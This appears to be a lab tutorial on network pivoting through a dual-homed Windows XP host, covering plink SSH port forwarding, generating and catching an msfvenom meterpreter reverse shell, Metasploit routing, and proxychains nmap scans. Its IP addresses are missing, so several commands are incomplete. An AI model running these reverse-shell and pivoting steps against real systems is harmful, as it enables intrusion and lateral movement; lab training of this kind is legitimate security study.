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This tutorial is about "moving" through a network (from machine to machine). We use a compromised host as our pivot to move through the network.  This tutorial has a lack of screenshots. You can create the screenshots yourself as you follow this tutorial ;-)


You need (at least) three machines for this tutorial. I suggest using VirtualBox or VMware machines.The Attacking Box (Kali Linux)IP: pivot host (Windows XP)Dual-Homed - Configure 2 Network Cards in VirtualBox!




Netmask: server (IIS, Apache - Windows or Linux, whatever u like) -> I use a Windows 2012 serverIP: is no need to use a gateway!


We want to reach the web server from the attacking box. But how can we do that? Both machines are in different subnets. Try to surf to the web server from the Kali-Box: does not work!(If you do not understand the problem at this point I highly suggest you leave this tutorial and get comfortable with network topics such as private network ranges and subnetting)


We use the dual-homed machine to pivot to the web server!

Scenario 1 (Remote Port Forwarding):

We connect to the Windows XP machine using "rdesktop" on the Kali Box. We don´t attack the pivot here.We have the credentials.

  1. Connect to the Windows XP machine from your Kali Box: rdesktop
  2. Download "plink.exe" from the Kali box to the Windows XP machine(plink.exe can be found on Kali -> "/usr/share/windows-binaries/plink.exe "-> Copy "plink.exe" to you web server root and start apache on Kali.Now you can download "plink.exe" on the Windows XP machine)
  3. Open a command prompt on the Windows XP machine and navigate to the place where you have saved "plink.exe"
  4. Start SSH Daemon on Kali-Box. /etc/init.d/ssh start
  5. Run the following command on the Windows XP machine:plink -P 22 -C -R with your SSH credentials on Kali)

Try to reach the web server from your Kali Box the following way: -> Voila: It works! You can see the web server from!OK, but what does the command do? Let's split the command to see what is going on:plink -P 22 -> Tunnel the traffic using SSH on Kali-Box -R -> -C is compression. -R tells plink to do a "Remote Port Forwarding" -> Local Host:Local Port:Remote Client:Remote Port (Local from the pivots perspective!)Read the command backward:"We bind the remote clients port 80 ( to our local port ( and tunnel the traffic to using SSH ( -P 22)

Scenario 2 (Local Port Forwarding):

We want to connect to our Windows XP machine using Remote Desktop Protocol (RDP). The Port is 3389.There is an Inbound Firewall rule that blocks connections to this port. Let´s pretend that we are not able to change the firewall settings.(Create a specific rule on the XP machine or just imagine that RDP is not reachable on Port 3389)The problem is: We still want RDP connection!We simply redirect the local port 3389 ,let´s say, to port 3390.On the Windows XP machine:  plink -P 22 -C -L -> Local Port Forwarding)Read the command backward to understand what is going on:On the Kali Box:rdesktop -> Voila, there is our Remote Desktop Session!Sweet!

Scenario 3 (Dynamic Port Forwarding):

You are familiar with the concepts of local and remote port forwarding from Scenario 1 and Scenario 2.Now let's do some Hacking!We want to Nmap the server on from our attacking Kali-Box. Let´s attack the pivot machine to get a meterpreter shell from it.(Generate a standalone executable meterpreter reverse shell (.exe file) on your Kali box, execute it on the pivot and catch it on Kali using Metasploit)

  1. Generate a Stand-Alone meterpreter executable:msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe -o meterpreter.exe
  2. Copy meterpreter.exe to Kalis webroot
  3. Download meterpreter.exe to the XP machine
  4. Setup the listener on the Kali Box:msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST LPORT 443exploit
  5. Double-Click on meterpreter.exe and run it on the XP Machine
  6. Now you have the meterpreter connection from the XP Machine on your Kali Box!
  7. Type "ifconfig" and see that this host is a dual homed machine.
  8. Type "background" to background the session
  9. Now we have to add a route to our metasploit session 1:route add 1(1 is the session number in metasploit)Shows: [*]Route added
  10. Verify that the route was added successfully:route print
  11. Now configure socks proxy in metasploit and start it:use auxiliary/server/socks4aset SRVHOST

(You can use default settings for SRVHOST as well. The port is important. Default is Port 1080)12. Configure proxy chains on the Kali Box:vi /etc/proxychains.confEdit the ProxyList at the bottom of the file:socks4   1080The configuration has to be the same as in metasploit13. Run you nmap scan using proxychains:Some Tipps:You should use the options -Pn (assume that host is up) and -sT (TCP connect scan) with nmap through proxychains! Using other scan types, TCP Syn scan for example, will not work!proxychains nmap -Pn -sT -p445,3389 two ports should be opened. If you see "denied" in the nmap result something went wrong with the proxy configuration or the route was added in the meterpreter session. Background the meterpreter session and then add the route in metasploit for the meterpreter Session! See Steps 9-11)14. Get Remote Desktopproxychains rdesktop Surf to firefox Hope this helps you. Please comment below with questions or suggestions.

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